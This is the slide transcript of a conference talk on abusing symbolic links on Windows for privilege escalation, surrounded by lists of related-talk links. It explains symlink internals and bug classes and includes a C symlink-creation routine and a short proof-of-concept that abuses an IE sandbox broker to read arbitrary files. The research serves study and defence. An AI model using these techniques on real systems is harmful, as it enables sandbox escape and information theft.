νεο λυκειονεο λυκειο
νεο λυκειο
 
Speak! How to talk in public and not wreck your voice (Ignite OSCON 2014)
Speak! How to talk in public and not wreck your voice (Ignite OSCON 2014)Speak! How to talk in public and not wreck your voice (Ignite OSCON 2014)
Speak! How to talk in public and not wreck your voice (Ignite OSCON 2014)
 
Mitsubishi company
Mitsubishi companyMitsubishi company
Mitsubishi company
 
United small business
United small businessUnited small business
United small business
 
Gajendra_Resume1
Gajendra_Resume1Gajendra_Resume1
Gajendra_Resume1
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh Jadon
 
νεο λυκειο
νεο λυκειονεο λυκειο
νεο λυκειο
 
More about health
More about healthMore about health
More about health
 
One Thor - Presentazione Giugno-Luglio 2014
One Thor  -  Presentazione Giugno-Luglio 2014 One Thor  -  Presentazione Giugno-Luglio 2014
One Thor - Presentazione Giugno-Luglio 2014
 
Meet the DIVA - by: Sandeep & Ankit
Meet the DIVA - by: Sandeep & Ankit Meet the DIVA - by: Sandeep & Ankit
Meet the DIVA - by: Sandeep & Ankit
 

Similar to Abusing Symlinks on Windows

James Forshaw, elevator action
James Forshaw, elevator actionJames Forshaw, elevator action
James Forshaw, elevator actionPacSecJP
 
MemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows Kernel
MemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows KernelMemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows Kernel
MemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows KernelIgor Korkin
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik OpcodesCODE BLUE
 
Kernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue Again
Kernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue AgainKernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue Again
Kernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue AgainIgor Korkin
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksNarendra Bhati
 
stackconf 2020 | Speeding up Linux disk encryption by Ignat Korchagin
stackconf 2020 | Speeding up Linux disk encryption by Ignat Korchaginstackconf 2020 | Speeding up Linux disk encryption by Ignat Korchagin
stackconf 2020 | Speeding up Linux disk encryption by Ignat KorchaginNETWAYS
 
Andrii Yatsenko "Make the most of Twig"
Andrii Yatsenko "Make the most of Twig"Andrii Yatsenko "Make the most of Twig"
Andrii Yatsenko "Make the most of Twig"Fwdays
 
Brighton SEO 2021 - A Deep Dive into the Depths of DevTools
Brighton SEO 2021 - A Deep Dive into the Depths of DevToolsBrighton SEO 2021 - A Deep Dive into the Depths of DevTools
Brighton SEO 2021 - A Deep Dive into the Depths of DevToolsChrisJohnson792
 
Wordpress Security 101
Wordpress Security 101Wordpress Security 101
Wordpress Security 101Robert Rowley
 
Static and Dynamic Analysis at Ning
Static and Dynamic Analysis at NingStatic and Dynamic Analysis at Ning
Static and Dynamic Analysis at NingZendCon
 
Security Checklist for TYPO3
Security Checklist for TYPO3Security Checklist for TYPO3
Security Checklist for TYPO3jweiland
 
Thinking hard about_python
Thinking hard about_pythonThinking hard about_python
Thinking hard about_pythonDaniel Greenfeld
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
2012 coscup - Build your PHP application on Heroku
2012 coscup - Build your PHP application on Heroku2012 coscup - Build your PHP application on Heroku
2012 coscup - Build your PHP application on Herokuronnywang_tw
 
Growing pains - PosKeyErrors and other malaises
Growing pains - PosKeyErrors and other malaisesGrowing pains - PosKeyErrors and other malaises
Growing pains - PosKeyErrors and other malaisesPhilip Bauer
 
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEsThotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEsSandra Escandor-O'Keefe
 

Similar to Abusing Symlinks on Windows (20)

James Forshaw, elevator action
James Forshaw, elevator actionJames Forshaw, elevator action
James Forshaw, elevator action
 
MemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows Kernel
MemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows KernelMemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows Kernel
MemoryRanger Prevents Hijacking FILE_OBJECT Structures in Windows Kernel
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
 
Kernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue Again
Kernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue AgainKernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue Again
Kernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue Again
 
SearchMonkey
SearchMonkeySearchMonkey
SearchMonkey
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web Attacks
 
stackconf 2020 | Speeding up Linux disk encryption by Ignat Korchagin
stackconf 2020 | Speeding up Linux disk encryption by Ignat Korchaginstackconf 2020 | Speeding up Linux disk encryption by Ignat Korchagin
stackconf 2020 | Speeding up Linux disk encryption by Ignat Korchagin
 
Andrii Yatsenko "Make the most of Twig"
Andrii Yatsenko "Make the most of Twig"Andrii Yatsenko "Make the most of Twig"
Andrii Yatsenko "Make the most of Twig"
 
Brighton SEO 2021 - A Deep Dive into the Depths of DevTools
Brighton SEO 2021 - A Deep Dive into the Depths of DevToolsBrighton SEO 2021 - A Deep Dive into the Depths of DevTools
Brighton SEO 2021 - A Deep Dive into the Depths of DevTools
 
Wordpress Security 101
Wordpress Security 101Wordpress Security 101
Wordpress Security 101
 
Static and Dynamic Analysis at Ning
Static and Dynamic Analysis at NingStatic and Dynamic Analysis at Ning
Static and Dynamic Analysis at Ning
 
Tactical Information Gathering
Tactical Information GatheringTactical Information Gathering
Tactical Information Gathering
 
Ext 0523
Ext 0523Ext 0523
Ext 0523
 
Security Checklist for TYPO3
Security Checklist for TYPO3Security Checklist for TYPO3
Security Checklist for TYPO3
 
Thinking hard about_python
Thinking hard about_pythonThinking hard about_python
Thinking hard about_python
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
2012 coscup - Build your PHP application on Heroku
2012 coscup - Build your PHP application on Heroku2012 coscup - Build your PHP application on Heroku
2012 coscup - Build your PHP application on Heroku
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Growing pains - PosKeyErrors and other malaises
Growing pains - PosKeyErrors and other malaisesGrowing pains - PosKeyErrors and other malaises
Growing pains - PosKeyErrors and other malaises
 
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEsThotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
 

More from OWASP Delhi

Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesGetting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesOWASP Delhi
 
Securing dns records from subdomain takeover
Securing dns records from subdomain takeoverSecuring dns records from subdomain takeover
Securing dns records from subdomain takeoverOWASP Delhi
 
Effective Cyber Security Report Writing
Effective Cyber Security Report WritingEffective Cyber Security Report Writing
Effective Cyber Security Report WritingOWASP Delhi
 
Data sniffing over Air Gap
Data sniffing over Air GapData sniffing over Air Gap
Data sniffing over Air GapOWASP Delhi
 
Demystifying Container Escapes
Demystifying Container EscapesDemystifying Container Escapes
Demystifying Container EscapesOWASP Delhi
 
Automating WAF using Terraform
Automating WAF using TerraformAutomating WAF using Terraform
Automating WAF using TerraformOWASP Delhi
 
Actionable Threat Intelligence
Actionable Threat IntelligenceActionable Threat Intelligence
Actionable Threat IntelligenceOWASP Delhi
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
Securing AWS environments by Ankit Giri
Securing AWS environments by Ankit GiriSecuring AWS environments by Ankit Giri
Securing AWS environments by Ankit GiriOWASP Delhi
 
Cloud assessments by :- Aakash Goel
Cloud assessments  by :- Aakash GoelCloud assessments  by :- Aakash Goel
Cloud assessments by :- Aakash GoelOWASP Delhi
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Wireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit RanjanWireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit RanjanOWASP Delhi
 
IETF's Role and Mandate in Internet Governance by Mohit Batra
IETF's Role and Mandate in Internet Governance by Mohit BatraIETF's Role and Mandate in Internet Governance by Mohit Batra
IETF's Role and Mandate in Internet Governance by Mohit BatraOWASP Delhi
 
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj MishraMalicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj MishraOWASP Delhi
 
ICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep SinghICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep SinghOWASP Delhi
 
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
Thwarting The Surveillance in Online Communication by Adhokshaj MishraThwarting The Surveillance in Online Communication by Adhokshaj Mishra
Thwarting The Surveillance in Online Communication by Adhokshaj MishraOWASP Delhi
 

More from OWASP Delhi (20)

Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesGetting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
 
Securing dns records from subdomain takeover
Securing dns records from subdomain takeoverSecuring dns records from subdomain takeover
Securing dns records from subdomain takeover
 
Effective Cyber Security Report Writing
Effective Cyber Security Report WritingEffective Cyber Security Report Writing
Effective Cyber Security Report Writing
 
Data sniffing over Air Gap
Data sniffing over Air GapData sniffing over Air Gap
Data sniffing over Air Gap
 
UDP Hunter
UDP HunterUDP Hunter
UDP Hunter
 
Demystifying Container Escapes
Demystifying Container EscapesDemystifying Container Escapes
Demystifying Container Escapes
 
Automating WAF using Terraform
Automating WAF using TerraformAutomating WAF using Terraform
Automating WAF using Terraform
 
Actionable Threat Intelligence
Actionable Threat IntelligenceActionable Threat Intelligence
Actionable Threat Intelligence
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
Securing AWS environments by Ankit Giri
Securing AWS environments by Ankit GiriSecuring AWS environments by Ankit Giri
Securing AWS environments by Ankit Giri
 
DMARC Overview
DMARC OverviewDMARC Overview
DMARC Overview
 
Cloud assessments by :- Aakash Goel
Cloud assessments  by :- Aakash GoelCloud assessments  by :- Aakash Goel
Cloud assessments by :- Aakash Goel
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang Bhatnagar
 
Wireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit RanjanWireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit Ranjan
 
IETF's Role and Mandate in Internet Governance by Mohit Batra
IETF's Role and Mandate in Internet Governance by Mohit BatraIETF's Role and Mandate in Internet Governance by Mohit Batra
IETF's Role and Mandate in Internet Governance by Mohit Batra
 
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj MishraMalicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
 
ICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep SinghICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep Singh
 
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
Thwarting The Surveillance in Online Communication by Adhokshaj MishraThwarting The Surveillance in Online Communication by Adhokshaj Mishra
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
 

Recently uploaded

The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightSafe Software
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
الأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهلهالأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهلهMohamed Sweelam
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAnitaRaj43
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuidePixlogix Infotech
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxFIDO Alliance
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization -  The evolution of API governanceAPI Governance and Monetization -  The evolution of API governance
API Governance and Monetization - The evolution of API governanceWSO2
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Quantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation ComputingQuantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation ComputingWSO2
 
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Choreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringChoreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringWSO2
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard37
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 

Recently uploaded (20)

The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and Insight
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
الأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهلهالأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهله
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptx
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization -  The evolution of API governanceAPI Governance and Monetization -  The evolution of API governance
API Governance and Monetization - The evolution of API governance
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Quantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation ComputingQuantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation Computing
 
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Choreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringChoreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software Engineering
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 

Abusing Symlinks on Windows

  • 1. A Link to the Past Abusing Symbolic Links on Windows James Forshaw @tiraniddo 1
  • 2. James Forshaw @tiraniddo Obligatory Background Slide ● Researcher in Google’s Project Zero team ● Specialize in Windows ○ Especially local privilege escalation ● Never met a logical vulnerability I didn’t like https://www.flickr.com/photos/barretthall/2478623520/ 2
  • 3. James Forshaw @tiraniddo What I’m Going to Talk About ● Implementation of Symbolic Links on Windows ● Exploitable Bug Classes ● Example vulnerabilities ● Offensive exploitation tricks 3
  • 5. James Forshaw @tiraniddo Dangers of Symbolic Links 5
  • 6. James Forshaw @tiraniddo Resource Creation or Overwrite 6 Privileged Application pathtoresource Write to resource sensitivepath Symbolic Link
  • 7. James Forshaw @tiraniddo Information Disclosure 7 Privileged Application pathtoresource Read Resource sensitivepath Symbolic Link Disclosure Unprivileged Application
  • 8. James Forshaw @tiraniddo Time of Check/Time of Use 8 Privileged Application pathtoresource Check and use Resource validfile Check Symbolic Link maliciousfile Use Symbolic Link
  • 9. James Forshaw @tiraniddo History of Windows Symbolic Links Windows NT 3.1 - July 27 1993 Object Manager Symbolic Links Registry Key Symbolic Links 9
  • 10. James Forshaw @tiraniddo History of Windows Symbolic Links Windows NT 3.1 - July 27 1993 Object Manager Symbolic Links Registry Key Symbolic Links Windows 2000 - Feb 17 2000 NTFS Mount Points and Directory Junctions 10
  • 11. James Forshaw @tiraniddo History of Windows Symbolic Links Windows NT 3.1 - July 27 1993 Object Manager Symbolic Links Registry Key Symbolic Links Windows 2000 - Feb 17 2000 NTFS Mount Points and Directory Junctions Windows Vista - Nov 30 2006 NTFS Symbolic Links 11
  • 12. James Forshaw @tiraniddo Object Manager Symbolic Links 12
  • 13. James Forshaw @tiraniddo Named Objects 13 IO/File ??C:Windowsnotepad.exe DeviceNamedPipemypipe Registry RegistryMachineSoftware Semaphore BaseNamedObjectsMySema
  • 14. James Forshaw @tiraniddo Creating Object Manager Symbolic Links HANDLE CreateSymlink(LPCWSTR linkname, LPCWSTR targetname) { OBJECT_ATTRIBUTES obj_attr; UNICODE_STRING name, target; HANDLE hLink; RtlInitUnicodeString(&name, linkname); RtlInitUnicodeString(&target, targetname); InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr); NtCreateSymbolicLinkObject(&hLink, SYMBOLIC_LINK_ALL_ACCESS, &obj_attr, &target); return hLink; } 14
  • 15. James Forshaw @tiraniddo Parsing Name Object Manager Reparsing NtOpenSemaphore 15 MyObjectsGlobalMySema
  • 16. James Forshaw @tiraniddo Object Manager Reparsing NtOpenSemaphore ObOpenObjectByName 16 Parsing Name MyObjectsGlobalMySema
  • 17. James Forshaw @tiraniddo Object Manager Reparsing NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName 17 Parsing Name MyObjectsGlobalMySema Current Component
  • 18. James Forshaw @tiraniddo Object Manager Reparsing NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName 18 Parsing Name MyObjectsGlobalMySema Current Component
  • 19. James Forshaw @tiraniddo Object Manager Reparsing NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName ObpParseSymbolicLink 19 Parsing Name MyObjectsGlobalMySema Current Component Global → BaseNamedObjects
  • 20. James Forshaw @tiraniddo Object Manager Reparsing NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName ObpParseSymbolicLink 20 Parsing Name MyObjectsGlobalMySema BaseNamedObjectsMySema Global → BaseNamedObjects
  • 21. James Forshaw @tiraniddo Object Manager Reparsing NtOpenSemaphore ObOpenObjectByName ObpLookupObjectName ObpParseSymbolicLink STATUS_REPARSE 21 Parsing Name BaseNamedObjectsMySema
  • 22. James Forshaw @tiraniddo Abusing Object Manager Symbolic Links ● Most obvious attack is object squatting ○ Redirect privileged object creation to another name ○ Open named pipes for attacking impersonation ○ Shadowing ALPC ports ● File symlink attacks perhaps more interesting! 22
  • 23. James Forshaw @tiraniddo Example Vulnerability IE EPM MOTWCreateFile Information Disclosure 23
  • 24. James Forshaw @tiraniddo IE Shell Broker MOTWCreateFile 24 HANDLE MOTWCreateFile(PCWSTR FileName, ...) { if (FileHasMOTW(FileName) || IsURLFile(FileName)) { return CreateFile(FileName, GENERIC_READ, ...); } } BOOL IsURLFile(PCWSTR FileName) { PCWSTR extension = PathFindExtension(FileName); return wcsicmp(extension, L".url") == 0; }
  • 25. James Forshaw @tiraniddo Win32 Path Support Path Description somepath Relative path to current directory c:somepath Absolute directory .c:somepath Device path, canonicalized ?c:somepath Device path, non- canonicalized Interesting!
  • 26. James Forshaw @tiraniddo Win32 to Native NT File Paths 26 .c:somepathWin32 Path
  • 27. James Forshaw @tiraniddo Win32 to Native NT File Paths 27 .c:somepath ??c:somepath Win32 Path Native Path RtlDosPathNameToRelativeNtPathName
  • 28. James Forshaw @tiraniddo Win32 to Native NT File Paths 28 .c:somepath ??c:somepath Win32 Path Native Path RtlDosPathNameToRelativeNtPathName DeviceHarddiskVolume4somepath ObpLookupObjectName After Lookup
  • 29. James Forshaw @tiraniddo Global Root Symlink 29 .GLOBALROOTsomepathWin32 Path Empty Symlink Path
  • 30. James Forshaw @tiraniddo Global Root Symlink 30 .GLOBALROOTsomepath ??GLOBALROOTsomepath Win32 Path Native Path RtlDosPathNameToRelativeNtPathName Empty Symlink Path
  • 31. James Forshaw @tiraniddo Global Root Symlink 31 .GLOBALROOTsomepath ??GLOBALROOTsomepath Win32 Path Native Path RtlDosPathNameToRelativeNtPathName somepath ObpLookupObjectName After Lookup Empty Symlink Path
  • 32. James Forshaw @tiraniddo Writeable Object Directories from IE Sandbox 32 Path Sandbox RPC Control PM SessionsXBaseNamedObjects PM SessionsXAppContainerNamedObjectsSID... EPM
  • 33. James Forshaw @tiraniddo Exploiting IShDocVwBroker* broker; CreateSymlink(L"RPC Controlfake.url", L"??C:somefile"); broker->MOTWCreateFile( L".GLOBALROOTRPC Controlfake.url", ...); // Read File 33
  • 34. James Forshaw @tiraniddo Registry Key Symbolic Links 34
  • 35. James Forshaw @tiraniddo Under the hood 35 NtOpenKey ObOpenObjectByName ObpLookupObjectName Parsing Name RegistryMachineMylink
  • 36. James Forshaw @tiraniddo Under the hood 36 NtOpenKey ObOpenObjectByName ObpLookupObjectName CmpParseKey Parsing Name RegistryMachineMylink CmpGetSymbolicLink Current Component
  • 37. James Forshaw @tiraniddo Under the hood 37 NtOpenKey ObOpenObjectByName ObpLookupObjectName CmpParseKeySTATUS_REPARSE CmpGetSymbolicLink Parsing Name RegistryMachineMylink RegistryMachineNewKey
  • 38. James Forshaw @tiraniddo Serious Limitations ● Windows 7 fixed numerous issues with registry symbolic links ○ Blocked symlinks between untrusted (user) and trusted (local machine) hives ○ Symbolic link must be a valid registry path ● MS10-021 ensured it was also available downstream ● Still can exploit user to user vulnerabilities such as in IE EPM ○ CVE-2013-5054 ○ CVE-2014-6322 ● Mitigation (pass flag to RegCreateKeyEx) still undocumented 38
  • 39. James Forshaw @tiraniddo NTFS Mount Points / Directory Junctions 39
  • 40. James Forshaw @tiraniddo Under the hood 40 NtOpenFile ObOpenObjectByName ObpLookupObjectName IopParseDevice Parsing Name ??C:tempmylinkfile NTFS Driver
  • 41. James Forshaw @tiraniddo Under the hood 41 NtOpenFile ObOpenObjectByName ObpLookupObjectName IopParseDevice Parsing Name ??C:tempmylinkfile ??C:Windows NTFS Driver
